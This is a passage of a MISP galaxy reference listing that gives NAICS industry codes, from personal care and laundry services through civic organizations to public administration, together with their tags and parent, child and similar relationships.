  • parent-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

8121

Personal Care Services

The tag is: misp-galaxy:naics="8121"

8121 has relationships with:

  • child-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812199" with estimative-language:likelihood-probability="likely"

81211

Hair, Nail, and Skin Care Services

The tag is: misp-galaxy:naics="81211"

81211 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812111

Barber Shops

The tag is: misp-galaxy:naics="812111"

812111 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812112

Beauty Salons

The tag is: misp-galaxy:naics="812112"

812112 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812113

Nail Salons

The tag is: misp-galaxy:naics="812113"

812113 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

81219

Other Personal Care Services

The tag is: misp-galaxy:naics="81219"

81219 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812191

Diet and Weight Reducing Centers

The tag is: misp-galaxy:naics="812191"

812191 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812199

Other Personal Care Services

The tag is: misp-galaxy:naics="812199"

812199 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

8122

Death Care Services

The tag is: misp-galaxy:naics="8122"

8122 has relationships with:

  • child-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812220" with estimative-language:likelihood-probability="likely"

81221

Funeral Homes and Funeral Services

The tag is: misp-galaxy:naics="81221"

81221 has relationships with:

  • child-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812210" with estimative-language:likelihood-probability="likely"

812210

Funeral Homes and Funeral Services

The tag is: misp-galaxy:naics="812210"

812210 has relationships with:

  • child-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81221" with estimative-language:likelihood-probability="likely"

81222

Cemeteries and Crematories

The tag is: misp-galaxy:naics="81222"

81222 has relationships with:

  • child-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812220" with estimative-language:likelihood-probability="likely"

812220

Cemeteries and Crematories

The tag is: misp-galaxy:naics="812220"

812220 has relationships with:

  • child-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81222" with estimative-language:likelihood-probability="likely"

8123

Drycleaning and Laundry Services

The tag is: misp-galaxy:naics="8123"

8123 has relationships with:

  • child-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812332" with estimative-language:likelihood-probability="likely"

81231

Coin-Operated Laundries and Drycleaners

The tag is: misp-galaxy:naics="81231"

81231 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812310" with estimative-language:likelihood-probability="likely"

812310

Coin-Operated Laundries and Drycleaners

The tag is: misp-galaxy:naics="812310"

812310 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81231" with estimative-language:likelihood-probability="likely"

81232

Drycleaning and Laundry Services (except Coin-Operated)

The tag is: misp-galaxy:naics="81232"

81232 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812320" with estimative-language:likelihood-probability="likely"

812320

Drycleaning and Laundry Services (except Coin-Operated)

The tag is: misp-galaxy:naics="812320"

812320 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81232" with estimative-language:likelihood-probability="likely"

81233

Linen and Uniform Supply

The tag is: misp-galaxy:naics="81233"

81233 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

812331

Linen Supply

The tag is: misp-galaxy:naics="812331"

812331 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

812332

Industrial Launderers

The tag is: misp-galaxy:naics="812332"

812332 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

8129

Other Personal Services

The tag is: misp-galaxy:naics="8129"

8129 has relationships with:

  • child-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81293" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81299" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812990" with estimative-language:likelihood-probability="likely"

81291

Pet Care (except Veterinary) Services

The tag is: misp-galaxy:naics="81291"

81291 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812910" with estimative-language:likelihood-probability="likely"

812910

Pet Care (except Veterinary) Services

The tag is: misp-galaxy:naics="812910"

812910 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81291" with estimative-language:likelihood-probability="likely"

81292

Photofinishing

The tag is: misp-galaxy:naics="81292"

81292 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

812921

Photofinishing Laboratories (except One-Hour)

The tag is: misp-galaxy:naics="812921"

812921 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

812922

One-Hour Photofinishing

The tag is: misp-galaxy:naics="812922"

812922 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

81293

Parking Lots and Garages

The tag is: misp-galaxy:naics="81293"

81293 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812930" with estimative-language:likelihood-probability="likely"

812930

Parking Lots and Garages

The tag is: misp-galaxy:naics="812930"

812930 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81293" with estimative-language:likelihood-probability="likely"

81299

All Other Personal Services

The tag is: misp-galaxy:naics="81299"

81299 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812990" with estimative-language:likelihood-probability="likely"

812990

All Other Personal Services

The tag is: misp-galaxy:naics="812990"

812990 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81299" with estimative-language:likelihood-probability="likely"

813

Religious, Grantmaking, Civic, Professional, and Similar Organizations

The tag is: misp-galaxy:naics="813"

813 has relationships with:

  • child-of: misp-galaxy:naics="81" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

8131

Religious Organizations

The tag is: misp-galaxy:naics="8131"

8131 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813110" with estimative-language:likelihood-probability="likely"

81311

Religious Organizations

The tag is: misp-galaxy:naics="81311"

81311 has relationships with:

  • child-of: misp-galaxy:naics="8131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813110" with estimative-language:likelihood-probability="likely"

813110

Religious Organizations

The tag is: misp-galaxy:naics="813110"

813110 has relationships with:

  • child-of: misp-galaxy:naics="8131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81311" with estimative-language:likelihood-probability="likely"

8132

Grantmaking and Giving Services

The tag is: misp-galaxy:naics="8132"

8132 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813219" with estimative-language:likelihood-probability="likely"

81321

Grantmaking and Giving Services

The tag is: misp-galaxy:naics="81321"

81321 has relationships with:

  • child-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

813211

Grantmaking Foundations

The tag is: misp-galaxy:naics="813211"

813211 has relationships with:

  • child-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

813212

Voluntary Health Organizations

The tag is: misp-galaxy:naics="813212"

813212 has relationships with:

  • child-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

813219

Other Grantmaking and Giving Services

The tag is: misp-galaxy:naics="813219"

813219 has relationships with:

  • child-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

8133

Social Advocacy Organizations

The tag is: misp-galaxy:naics="8133"

8133 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813319" with estimative-language:likelihood-probability="likely"

81331

Social Advocacy Organizations

The tag is: misp-galaxy:naics="81331"

81331 has relationships with:

  • child-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

813311

Human Rights Organizations

The tag is: misp-galaxy:naics="813311"

813311 has relationships with:

  • child-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

813312

Environment, Conservation and Wildlife Organizations

The tag is: misp-galaxy:naics="813312"

813312 has relationships with:

  • child-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

813319

Other Social Advocacy Organizations

The tag is: misp-galaxy:naics="813319"

813319 has relationships with:

  • child-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

8134

Civic and Social Organizations

The tag is: misp-galaxy:naics="8134"

8134 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81341" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813410" with estimative-language:likelihood-probability="likely"

81341

Civic and Social Organizations

The tag is: misp-galaxy:naics="81341"

81341 has relationships with:

  • child-of: misp-galaxy:naics="8134" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813410" with estimative-language:likelihood-probability="likely"

813410

Civic and Social Organizations

The tag is: misp-galaxy:naics="813410"

813410 has relationships with:

  • child-of: misp-galaxy:naics="8134" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81341" with estimative-language:likelihood-probability="likely"

8139

Business, Professional, Labor, Political, and Similar Organizations

The tag is: misp-galaxy:naics="8139"

8139 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81392" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81393" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81394" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813990" with estimative-language:likelihood-probability="likely"

81391

Business Associations

The tag is: misp-galaxy:naics="81391"

81391 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813910" with estimative-language:likelihood-probability="likely"

813910

Business Associations

The tag is: misp-galaxy:naics="813910"

813910 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81391" with estimative-language:likelihood-probability="likely"

81392

Professional Organizations

The tag is: misp-galaxy:naics="81392"

81392 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813920" with estimative-language:likelihood-probability="likely"

813920

Professional Organizations

The tag is: misp-galaxy:naics="813920"

813920 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81392" with estimative-language:likelihood-probability="likely"

81393

Labor Unions and Similar Labor Organizations

The tag is: misp-galaxy:naics="81393"

81393 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813930" with estimative-language:likelihood-probability="likely"

813930

Labor Unions and Similar Labor Organizations

The tag is: misp-galaxy:naics="813930"

813930 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81393" with estimative-language:likelihood-probability="likely"

81394

Political Organizations

The tag is: misp-galaxy:naics="81394"

81394 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813940" with estimative-language:likelihood-probability="likely"

813940

Political Organizations

The tag is: misp-galaxy:naics="813940"

813940 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81394" with estimative-language:likelihood-probability="likely"

81399

Other Similar Organizations (except Business, Professional, Labor, and Political Organizations)

The tag is: misp-galaxy:naics="81399"

81399 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813990" with estimative-language:likelihood-probability="likely"

813990

Other Similar Organizations (except Business, Professional, Labor, and Political Organizations)

The tag is: misp-galaxy:naics="813990"

813990 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81399" with estimative-language:likelihood-probability="likely"

814

Private Households

The tag is: misp-galaxy:naics="814"

814 has relationships with:

  • child-of: misp-galaxy:naics="81" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8141" with estimative-language:likelihood-probability="likely"

8141

Private Households

The tag is: misp-galaxy:naics="8141"

8141 has relationships with:

  • child-of: misp-galaxy:naics="814" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="814110" with estimative-language:likelihood-probability="likely"

81411

Private Households

The tag is: misp-galaxy:naics="81411"

81411 has relationships with:

  • child-of: misp-galaxy:naics="8141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="814110" with estimative-language:likelihood-probability="likely"

814110

Private Households

The tag is: misp-galaxy:naics="814110"

814110 has relationships with:

  • child-of: misp-galaxy:naics="8141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81411" with estimative-language:likelihood-probability="likely"

92

Public Administration

The tag is: misp-galaxy:naics="92"

92 has relationships with:

  • parent-of: misp-galaxy:naics="921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="924" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="925" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="927" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="928" with estimative-language:likelihood-probability="likely"

921

Executive, Legislative, and Other General Government Support

The tag is: misp-galaxy:naics="921"

921 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

9211

Executive, Legislative, and Other General Government Support

The tag is: misp-galaxy:naics="9211"

9211 has relationships with:

  • child-of: misp-galaxy:naics="921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921190" with estimative-language:likelihood-probability="likely"

92111

Executive Offices

The tag is: misp-galaxy:naics="92111"

92111 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921110" with estimative-language:likelihood-probability="likely"

921110

Executive Offices

The tag is: misp-galaxy:naics="921110"

921110 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92111" with estimative-language:likelihood-probability="likely"

92112

Legislative Bodies

The tag is: misp-galaxy:naics="92112"

92112 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921120" with estimative-language:likelihood-probability="likely"

921120

Legislative Bodies

The tag is: misp-galaxy:naics="921120"

921120 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92112" with estimative-language:likelihood-probability="likely"

92113

Public Finance Activities

The tag is: misp-galaxy:naics="92113"

92113 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921130" with estimative-language:likelihood-probability="likely"

921130

Public Finance Activities

The tag is: misp-galaxy:naics="921130"

921130 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92113" with estimative-language:likelihood-probability="likely"

92114

Executive and Legislative Offices, Combined

The tag is: misp-galaxy:naics="92114"

92114 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921140" with estimative-language:likelihood-probability="likely"

921140

Executive and Legislative Offices, Combined

The tag is: misp-galaxy:naics="921140"

921140 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92114" with estimative-language:likelihood-probability="likely"

92115

American Indian and Alaska Native Tribal Governments

The tag is: misp-galaxy:naics="92115"

92115 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921150" with estimative-language:likelihood-probability="likely"

921150

American Indian and Alaska Native Tribal Governments

The tag is: misp-galaxy:naics="921150"

921150 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92115" with estimative-language:likelihood-probability="likely"

92119

Other General Government Support

The tag is: misp-galaxy:naics="92119"

92119 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921190" with estimative-language:likelihood-probability="likely"

921190

Other General Government Support

The tag is: misp-galaxy:naics="921190"

921190 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92119" with estimative-language:likelihood-probability="likely"

922

Justice, Public Order, and Safety Activities

The tag is: misp-galaxy:naics="922"

922 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

9221

Justice, Public Order, and Safety Activities

The tag is: misp-galaxy:naics="9221"

9221 has relationships with:

  • child-of: misp-galaxy:naics="922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92215" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92216" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922160" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922190" with estimative-language:likelihood-probability="likely"

92211

Courts

The tag is: misp-galaxy:naics="92211"

92211 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922110" with estimative-language:likelihood-probability="likely"

922110

Courts

The tag is: misp-galaxy:naics="922110"

922110 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92211" with estimative-language:likelihood-probability="likely"

92212

Police Protection

The tag is: misp-galaxy:naics="92212"

92212 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922120" with estimative-language:likelihood-probability="likely"

922120

Police Protection

The tag is: misp-galaxy:naics="922120"

922120 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92212" with estimative-language:likelihood-probability="likely"

92213

Legal Counsel and Prosecution

The tag is: misp-galaxy:naics="92213"

92213 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922130" with estimative-language:likelihood-probability="likely"

922130

Legal Counsel and Prosecution

The tag is: misp-galaxy:naics="922130"

922130 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92213" with estimative-language:likelihood-probability="likely"

92214

Correctional Institutions

The tag is: misp-galaxy:naics="92214"

92214 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922140" with estimative-language:likelihood-probability="likely"

922140

Correctional Institutions

The tag is: misp-galaxy:naics="922140"

922140 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92214" with estimative-language:likelihood-probability="likely"

92215

Parole Offices and Probation Offices

The tag is: misp-galaxy:naics="92215"

92215 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922150" with estimative-language:likelihood-probability="likely"

922150

Parole Offices and Probation Offices

The tag is: misp-galaxy:naics="922150"

922150 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92215" with estimative-language:likelihood-probability="likely"

92216

Fire Protection

The tag is: misp-galaxy:naics="92216"

92216 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922160" with estimative-language:likelihood-probability="likely"

922160

Fire Protection

The tag is: misp-galaxy:naics="922160"

922160 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92216" with estimative-language:likelihood-probability="likely"

92219

Other Justice, Public Order, and Safety Activities

The tag is: misp-galaxy:naics="92219"

92219 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922190" with estimative-language:likelihood-probability="likely"

922190

Other Justice, Public Order, and Safety Activities

The tag is: misp-galaxy:naics="922190"

922190 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92219" with estimative-language:likelihood-probability="likely"

923

Administration of Human Resource Programs

The tag is: misp-galaxy:naics="923"

923 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

9231

Administration of Human Resource Programs

The tag is: misp-galaxy:naics="9231"

9231 has relationships with:

  • child-of: misp-galaxy:naics="923" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923140" with estimative-language:likelihood-probability="likely"

92311

Administration of Education Programs

The tag is: misp-galaxy:naics="92311"

92311 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="923110" with estimative-language:likelihood-probability="likely"

923110

Administration of Education Programs

The tag is: misp-galaxy:naics="923110"

923110 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92311" with estimative-language:likelihood-probability="likely"

92312

Administration of Public Health Programs

The tag is: misp-galaxy:naics="92312"

92312 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="923120" with estimative-language:likelihood-probability="likely"

923120

Administration of Public Health Programs

The tag is: misp-galaxy:naics="923120"

923120 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92312" with estimative-language:likelihood-probability="likely"

92313

Administration of Human Resource Programs (except Education, Public Health, and Veterans' Affairs Programs)

The tag is: misp-galaxy:naics="92313"

92313 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="923130" with estimative-language:likelihood-probability="likely"

923130

Administration of Human Resource Programs (except Education, Public Health, and Veterans' Affairs Programs)

The tag is: misp-galaxy:naics="923130"

923130 has relationships with:

